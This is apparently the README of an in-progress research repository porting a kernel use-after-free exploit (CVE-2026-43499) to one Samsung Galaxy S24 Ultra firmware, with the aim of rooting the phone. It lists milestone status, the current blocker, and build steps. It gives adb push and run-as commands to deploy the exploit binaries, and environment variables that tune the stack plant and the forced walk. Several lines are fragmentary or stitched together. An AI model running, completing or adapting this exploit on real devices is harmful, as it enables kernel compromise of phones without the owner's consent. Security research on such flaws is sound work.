
CVE-2026-43499 porting di ricerca per Galaxy S24 Ultra SM-S928U1 DZF2 (COMPLETATO)
Porting di ricerca specifico per dispositivo di CVE-2026-43499 per il Samsung Galaxy S24 Ultra statunitense sul firmware S928USQS6DZF2 (dominio app / percorso di produzione).
Questo repository è la controparte S24U di CVE-2026-43499-S25U. Documenta lo stato di avanzamento attuale e incompleto: il piano di controllo e l'armamento dell'UAF dello stack residuo sono in atto; una scrittura pulita del gate (hits>0) non è ancora stata ottenuta.
Model: SM-S928U1
Codename: e3q
Android: 14 / BP4A.251205.006 (display family)
Build / AP: S928U1UES6DZF2 / S928USQS6DZF2
Fingerprint: samsung/e3qsqw/e3q:14/UP1A.231005.007/S928USQS6DZF2:user/release-keys
Kernel: 6.1.145-android14-11-33419968-abS928USQS6DZF2
Architecture: arm64 / 4K pages
Gli offset e i layout valgono solo per questo firmware. Non trasferire costanti tra build diverse senza prove.
| Fase | Stato |
|---|---|
| KernelSnitch mm leak / preparazione pagine | Funzionante in produzione |
| Reclaim della bank + MSG_PEEK (owner=1) | Funzionante |
| Arm classico EDEADLK dell'UAF dello stack residuo | Funzionante |
| Plant dello stack (nfds ≤ 320, shift base residua=2) | Funzionante |
| Match early-exit @ prio 120 (non 139) | Funzionante |
| Geometria di soft write in early-exit | Piantata in sicurezza; nessun walk |
REPLANT + walk adjust_pi forzato tramite walk_nice | Provato; finora sempre KP |
Oracolo del gate hits>0 | Aperto |
| Pipe phys-rw / root Android / KernelSU | Non raggiunto |
Blocker: geometria residua walk-safe. Un vero plant RB_EMPTY richiede la VA residua del kernel (APP_STAMP_RESIDUAL_ADDR / APP_STAMP_OVERLAY_BASE). Alberi forgiati e overlay KEEP (che si azzerano sotto FD_ZERO) causano panic al walk forzato. Vedi docs/PROGRESS.md.
agent/s928u-bp4a-251205-006 (E3Q DZF2)Apache License 2.0: LICENSE.
e3q-S928USQS6DZF2 (oracolo fisico P0, layout della bank, geometria della pipe per DZF2).cve-2026-43499-app.so) con slide_app.c: plant di stamp residui, soft_match, walk REPLANT, walk_nice, NO_PLANT, hook di plant EMPTY, bank peek, cablaggio del drain.O_APPEND (evita la sovrascrittura dei log tra padre e figlio).export ANDROID_NDK_HOME=/path/to/ndk # e.g. r28 / API 34 clang
make -j$(nproc)
# or:
make app API=34
Output:
build/e3q-S928USQS6DZF2/cve-2026-43499-app.so
build/e3q-S928USQS6DZF2/cve-2026-43499-root
build/e3q-S928USQS6DZF2/cve-2026-43499 # optional standalone
ADB Windows (o adb host) verso il seriale R5CXB20H9FD (esempio di unità di ricerca):
# Prefer the rebuilt helper (O_APPEND logs), not only the APK copy.
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-app.so /data/local/tmp/
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-root /data/local/tmp/
adb shell "run-as dev.busung.s25uroot sh -c '
mkdir -p files/payload-overrides/e3q-S928USQS6DZF2
cp /data/local/tmp/cve-2026-43499-app.so \
files/payload-overrides/e3q-S928USQS6DZF2/
cp /data/local/tmp/cve-2026-43499-root files/
chmod 700 files/cve-2026-43499-root \
files/payload-overrides/e3q-S928USQS6DZF2/cve-2026-43499-app.so
'"
export APP_STACK_UAF_STAMP=1
export APP_STAMP_PLANT=soft
export APP_STAMP_SOFT_MATCH=1
export APP_STAMP_FIXED_SHIFT=2
export APP_BANK_VALID_ROOT=1
export APP_STAMP_STATUS_PATH=/data/user/0/dev.busung.s25uroot/files/stamp_status_last.txt
# run via helper --run-payload ... (see docs/PROGRESS.md)
# After soft_match plant: change residual prio then force task nice change.
export APP_STAMP_REPLANT_WALK=1
export APP_STAMP_WALK_PRIO=100
export APP_STAMP_WALK_NICE=18 # must differ from first nice (default 19)
# Prefer EMPTY bank for some paths; still KP without residual kVA EMPTY plant
Non riscansionare gli shift di plant 0–4; la base 2 è consolidata.
| Documento | Contenuto |
|---|---|
| docs/PROGRESS.md | Matrice delle milestone, rivendicazioni OBS/SRC, punto di interruzione |
| docs/ENV_REFERENCE.md | Variabili d'ambiente per i percorsi stamp/bank |
| docs/RUN_HISTORY.md | Cronologia condensata delle esecuzioni sul dispositivo (RUN047–062) |
Usa solo su dispositivi di tua proprietà o su cui hai esplicita autorizzazione al test. Questo repository è software di ricerca per un percorso su telefoni di produzione bloccati; non è un root definitivo né un installer KernelSU.
L'integrazione KernelSU è fuori scope finché non esistono un percorso affidabile di scrittura pipe/phys e un percorso di root. Non trattare questo repository come pronto per KSU.